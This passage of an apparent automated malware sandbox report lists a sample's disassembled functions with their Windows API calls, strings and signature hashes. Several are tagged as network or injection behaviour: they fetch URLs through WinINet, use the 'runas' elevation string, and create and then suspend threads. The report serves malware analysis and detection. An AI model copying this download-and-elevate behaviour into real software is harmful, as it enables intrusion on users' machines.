                                                                                                                                            • Opcode ID: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction ID: 02eb9b7f6cedb68595ea1e2e4df000aa86c265fce73759de2f294495a80403d0
                                                                                                                                            • Opcode Fuzzy Hash: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction Fuzzy Hash: BC315E31600700DFDB21AA3AE845BDB77E8EF80395F10951FE059D7251DB78ADC08798
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211995A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                            • Opcode ID: 85d014af914f65cc9923891e831f20f9f36d7ff5d182b98eb42bd64b66671185
                                                                                                                                            • Instruction ID: ea3fdeb2e4bdbd4bb5ce2fd47582209f9da935ba1865da0fbdcedc51db2c10c1
                                                                                                                                            • Opcode Fuzzy Hash: 85d014af914f65cc9923891e831f20f9f36d7ff5d182b98eb42bd64b66671185
                                                                                                                                            • Instruction Fuzzy Hash: A3C10570A44249EFDF25DF98D8A0BADBBF1AF49304F4440B8E9659B391C7319942CF64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004022B0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00402351
                                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402363
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 0040237A
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238B
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238E
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040239F
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004023A2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                                                            • String ID: <$Microsoft Internet Explorer$runas
                                                                                                                                            • API String ID: 4294395943-436926838
                                                                                                                                            • Opcode ID: 4212a34dfa56d952eef48b40269fe4657b9eb26caea2bd5cb5b46d5a9bb85872
                                                                                                                                            • Instruction ID: 836f0c5934710c0407d646d4299d5f63ee009bd7aa37a993408d58964a26c1b2
                                                                                                                                            • Opcode Fuzzy Hash: 4212a34dfa56d952eef48b40269fe4657b9eb26caea2bd5cb5b46d5a9bb85872
                                                                                                                                            • Instruction Fuzzy Hash: A5410731E00118ABDB18DF65CD45BAEB779EF45300F50846EE915B72C1D7BCAA41CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02115EEA, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction ID: f8a04a3f27a253e5962f83ecd64874d78125c817f542f3e1d01edd95211aaadf
                                                                                                                                            • Opcode Fuzzy Hash: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction Fuzzy Hash: 4A21667A950108FFCB51EFA4D881DDE7BBBAF48340B9141A6E9159F121EB31EA54CF80
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415C9A, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction ID: 166d972883325de44ce7bdabef546b1d3901efceb99f724343cd7b5bc390e77d
                                                                                                                                            • Opcode Fuzzy Hash: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction Fuzzy Hash: FA21BB76900618EFCB41EF95C841DDD7FB8AF88344B00556AFA199B121DB35EAC4CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040F900, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F937
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040F93F
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F9C8
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040F9F3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040FA48
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 1170836740-3733052814
                                                                                                                                            • Opcode ID: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction ID: 894b8edc5c57a2ad9ab008264311dd0855dc9107bafb368bc8a4d607022375e2
                                                                                                                                            • Opcode Fuzzy Hash: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction Fuzzy Hash: 7651B030B00215AFCF24DF29D840A6E7BA5AF44318F14807BE8086BBD2D7799D09CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041606C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 2!A$api-ms-$ext-ms-
                                                                                                                                            • API String ID: 0-3344510271
                                                                                                                                            • Opcode ID: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction ID: cb64fe6ad5cfcc4e8d6b7301ff6b9be212c388882d563f31cd3313a8b65e95eb
                                                                                                                                            • Opcode Fuzzy Hash: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction Fuzzy Hash: 6721D871B01231BBCB318B389D41A9B3B689F057A0F270576FD15A7392DB38DD8185E8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211B053, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction ID: 94bfb070cbba7aa6ff244b8d2a0fe0cff5127991feb4f3843ce6290b42f3fc6b
                                                                                                                                            • Opcode Fuzzy Hash: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction Fuzzy Hash: AD510571A8C641EFDB28AF74DC80A6E7BB6EF41718F5042B9E8109B180EB319605CB54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041AE03, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 2996455cbe232ae2e60e10dc37e6e12dcc0ea1e9d4f9ef0a4b56ef1023022040
                                                                                                                                            • Instruction ID: 2a1f976b7b4bcbb86613db8ff6b19fd986a78d3bd4204cc8e7b10c550d2c21a6
                                                                                                                                            • Opcode Fuzzy Hash: 2996455cbe232ae2e60e10dc37e6e12dcc0ea1e9d4f9ef0a4b56ef1023022040
                                                                                                                                            • Instruction Fuzzy Hash: 1851D571A05301AFDB24AF759881AEB7BB4EF45314F0041BFE51097282EB3D89C68A9D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00407AE0, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 340COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040857A
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00408589
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xinvalid_argumentstd::_
                                                                                                                                            • String ID: :::$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 909987262-1139504419
                                                                                                                                            • Opcode ID: 747017cd42a3fda193bfb032d162d03025e5e921311a098fa13f7e0c74a22b0a
                                                                                                                                            • Instruction ID: 1a67c78f0cb392b8ff53f714058822714b37d0e65a955eefefe6e82784eebe80
                                                                                                                                            • Opcode Fuzzy Hash: 747017cd42a3fda193bfb032d162d03025e5e921311a098fa13f7e0c74a22b0a
                                                                                                                                            • Instruction Fuzzy Hash: 0CE1E170E00208DFEF14EFA9C94579D7BB5AB01304F50846ED4553B2C2DBB99A89CF99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405E24, Relevance: 10.7, APIs: 7, Instructions: 247networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00405E33
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,?), ref: 00405EDC
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000003FF,00000010), ref: 00405F6D
                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 00405FF4
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00406005
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600A
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$FileHttpReadRequest$OpenSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 856522067-0
                                                                                                                                            • Opcode ID: 6fb7e0b7ced6ae677faf849f43d845e802a25b11d2176dfb1b901f1221911620
                                                                                                                                            • Instruction ID: 0815bf64a4598977de38fa6e31ec9a7cd70cf72a29c17ea7a1c6806020119ff9
                                                                                                                                            • Opcode Fuzzy Hash: 6fb7e0b7ced6ae677faf849f43d845e802a25b11d2176dfb1b901f1221911620
                                                                                                                                            • Instruction Fuzzy Hash: 6B81F771600008AFEB18DF28CD85BAE7B76EF85304F50417AF805A72D5D7399A91CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02101E70, Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02101EB2
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02101EE3
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02101EF1
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02101F04
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02101F2E
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 02101F41
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02101FF2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap$AccountLookupName$ConvertFreeLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 856199767-0
                                                                                                                                            • Opcode ID: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction ID: da245020c4f4701bf6b2d648cab42e7854b776941152835fc7f86bd8ff76dccb
                                                                                                                                            • Opcode Fuzzy Hash: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction Fuzzy Hash: 1D516075A00219AFDB10DFA5DD88FAFBBBDEF44344F014569E905A3280EB749E059BA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02102960, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 127threadsleepinjectionCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0210E120: Concurrency::cancel_current_task.LIBCPMT ref: 0210E241
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004026A0,00000000,00000000,00000000), ref: 021029C6
                                                                                                                                            • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?), ref: 021029D3
                                                                                                                                            • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 021029DA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                                                                            • String ID: HB$hB$runas
                                                                                                                                            • API String ID: 1039963361-2279071875
                                                                                                                                            • Opcode ID: 82e951c8a91862d43a4e1cbda381c2a80e0ba4ab15a03fcfabfbf8e519cf8787
                                                                                                                                            • Instruction ID: 5170cb0cdb8129aa87c12741721d53565e87c1ccc4a28072474d21f20407d820
                                                                                                                                            • Opcode Fuzzy Hash: 82e951c8a91862d43a4e1cbda381c2a80e0ba4ab15a03fcfabfbf8e519cf8787
                                                                                                                                            • Instruction Fuzzy Hash: 8341CF71250148AFEB28DF29CCD8B8D3B66AF89304F908619F91587BD5CBB9D8C18B44
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405B90, Relevance: 10.6, APIs: 7, Instructions: 105networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405BC5
                                                                                                                                            • InternetOpenA.WININET(0042BC85,00000000,00000000,00000000,00000000), ref: 00405BDA
                                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00405BFA
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00405C11
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405C53
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405C62
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$FileOpen$CreateRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4113138902-0
                                                                                                                                            • Opcode ID: 7afcf3ba51e1d786664fd5339b475634f779685474f0816cdc5f2f1f1dce4384
                                                                                                                                            • Instruction ID: f2f2221e68c15033dc25878cc5138cc8e1f36a1742d9ec25df9f850a3b97c991
                                                                                                                                            • Opcode Fuzzy Hash: 7afcf3ba51e1d786664fd5339b475634f779685474f0816cdc5f2f1f1dce4384
                                                                                                                                            • Instruction Fuzzy Hash: 3E31A731340208BBEB20DF65DD85FEE37A9EF48704F60412AF904A62C1D7B9E9818F58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211B9B7, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0211B97F: _free.LIBCMT ref: 0211B9A4
                                                                                                                                            • _free.LIBCMT ref: 0211BA05
                                                                                                                                              • Part of subcall function 02115711: HeapFree.KERNEL32(00000000,00000000,?,021147F3), ref: 02115727
                                                                                                                                              • Part of subcall function 02115711: GetLastError.KERNEL32(?,?,021147F3), ref: 02115739
                                                                                                                                            • _free.LIBCMT ref: 0211BA10
                                                                                                                                            • _free.LIBCMT ref: 0211BA1B
                                                                                                                                            • _free.LIBCMT ref: 0211BA6F
                                                                                                                                            • _free.LIBCMT ref: 0211BA7A
                                                                                                                                            • _free.LIBCMT ref: 0211BA85
                                                                                                                                            • _free.LIBCMT ref: 0211BA90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction ID: 66f793a2e9d50a9534d21649fe2bafbf04cfc66c9cf4c6a03a180aa53af4ba02
                                                                                                                                            • Opcode Fuzzy Hash: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction Fuzzy Hash: 10111AB1584B48FFDA30BFB0CC86FCB77DBAF50704F800835A2996A055EB75A6058E90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041B767, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041B72F: _free.LIBCMT ref: 0041B754
                                                                                                                                            • _free.LIBCMT ref: 0041B7B5
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B7C0
                                                                                                                                            • _free.LIBCMT ref: 0041B7CB
                                                                                                                                            • _free.LIBCMT ref: 0041B81F
                                                                                                                                            • _free.LIBCMT ref: 0041B82A
                                                                                                                                            • _free.LIBCMT ref: 0041B835
                                                                                                                                            • _free.LIBCMT ref: 0041B840
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction ID: ffe7088ae5449a6b3a5a215e186331137a1bbb89884f415634a75f73b0614f0f
                                                                                                                                            • Opcode Fuzzy Hash: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction Fuzzy Hash: DF116D31540B04EBDA20BFB2CC47FDB77ACDF84744F40481EB2AD6A092EB38A5848694
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02117567, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(?,02103D40,00000000), ref: 021175AF
                                                                                                                                            • __fassign.LIBCMT ref: 0211778E
                                                                                                                                            • __fassign.LIBCMT ref: 021177AB
                                                                                                                                            • WriteFile.KERNEL32(?,02103D40,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 021177F3
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 02117833
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 021178DF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            • Opcode ID: eafb416fabd52c576e64e5b09df7842b497485bc3c593586b614e5a75beb33a1
                                                                                                                                            • Instruction ID: 841725758be003ca183c754ce27a2cdfef12c021831b9f0c6bbbb196b0cc43b2
                                                                                                                                            • Opcode Fuzzy Hash: eafb416fabd52c576e64e5b09df7842b497485bc3c593586b614e5a75beb33a1
                                                                                                                                            • Instruction Fuzzy Hash: 21D17971D402589FDF15CFA8D880AEDFBB5AF48314F28417AE855BB381D730AA46CB64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00417317, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(?,00403AF0,00000000), ref: 0041735F
                                                                                                                                            • __fassign.LIBCMT ref: 0041753E
                                                                                                                                            • __fassign.LIBCMT ref: 0041755B
                                                                                                                                            • WriteFile.KERNEL32(?,00403AF0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175A3
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004175E3
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041768F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            • Opcode ID: be274a939198ef22bbc0e4bf3e1db74088a8381b1d284a182586deaff3b97251
                                                                                                                                            • Instruction ID: 2887c3a552ed1fc2b06bfe8e5bf07c6bde8add9ac4243d38c689086ebbc0ae5f
                                                                                                                                            • Opcode Fuzzy Hash: be274a939198ef22bbc0e4bf3e1db74088a8381b1d284a182586deaff3b97251
                                                                                                                                            • Instruction Fuzzy Hash: 83D1AE71D052589FCF15CFA8C8809EDBBB5BF49314F28416AE815BB342D734AA86CF58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0210FF54, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0210FF4B,0210FDB9,0210F6C7), ref: 0210FF62
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0210FF70
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0210FF89
                                                                                                                                            • SetLastError.KERNEL32(00000000,0210FF4B,0210FDB9,0210F6C7), ref: 0210FFDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction ID: 048ff8caadd677e863fbef17a25e1ba68ea60b85ea78292d0e6617784674260d
                                                                                                                                            • Opcode Fuzzy Hash: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction Fuzzy Hash: CB01473378D3215EA63437756CC6A6B2796EB0B774320033AF820808F5EFE108539548
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040FD04, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0040FCFB,0040FB69,0040F477), ref: 0040FD12
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD20
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD39
                                                                                                                                            • SetLastError.KERNEL32(00000000,0040FCFB,0040FB69,0040F477), ref: 0040FD8B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction ID: 8cc6dcbae44a2d52cf8c11f23be7c67a5e481590007d6c0e7033467faf16e6d0
                                                                                                                                            • Opcode Fuzzy Hash: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction Fuzzy Hash: 6C0124337093216EE63026766C85AA726A4EF0537A360023FF811656F2EFAE5C87514C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00402710, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
